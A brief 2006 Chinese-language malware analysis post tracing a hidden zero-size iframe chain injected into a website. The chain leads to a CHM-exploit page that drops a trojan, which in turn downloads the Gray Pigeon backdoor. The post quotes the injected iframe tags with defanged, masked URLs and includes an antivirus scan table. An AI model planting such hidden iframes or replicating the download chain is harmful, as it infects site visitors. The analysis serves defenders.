endurer 原创
2006-05-04 第1版
某网站被加入:
<iframe src="hxxp://95762.***512j.com/" width="0" height="0">
hxxp://95762.***512j.com/index的内容为:
<iframe src="hxxp://www.***kkkshop.com/images/index.htm" width="0" height="0"></iframe>
hxxp://www.***kkkshop.com/images/index.htm的内容为:
<iframe src="hxxp://www.***kkkshop.com/cnshop/img/index.htm" width="0" height="0"></iframe>
hxxp://www.***kkkshop.com/cnshop/img/index.htm的内容为escope()的代码,利用CHM漏洞下载young.gif和young.css两个文件。
young.gif 利用WSH在IE临时缓存中寻找young.css,复制为C:/arcldrer.exe并运行;创建c:/cmd.bat来清除痕迹。
Antivirus | Version | Update | Result |
AntiVir | 6.34.0.24 | 04.20.2006 | no virus found |
Avast | 4.6.695.0 | 05.03.2006 | no virus found |
AVG | 386 | 05.04.2006 | no virus found |
Avira | 6.34.1.58 | 05.03.2006 | no virus found |
BitDefender | 7.2 | 05.04.2006 | Exploit.HTML.Mht.ABR |
CAT-QuickHeal | 8.00 | 05.03.2006 | no virus found |
ClamAV | devel-20060426 | 05.03.2006 | no virus found |
DrWeb | 4.33 | 05.03.2006 | Trojan.DownLoader.4263 |
eTrust-InoculateIT | 23.71.146 | 05.04.2006 | no virus found |
eTrust-Vet | 12.4.2191 | 05.02.2006 | no virus found |
Ewido | 3.5 | 05.03.2006 | no virus found |
Fortinet | 2.71.0.0 | 05.04.2006 | no virus found |
F-Prot | 3.16c | 05.03.2006 | no virus found |
young.css 是个PE格式的文件,会下载hxxp://www.***huayimei.com/bbs/Images/manage/zone.exe,存为C:/Program Files/zone.exe。这个是灰鸽子。
瑞星将young.css报为Trojan.DL.Delf.it。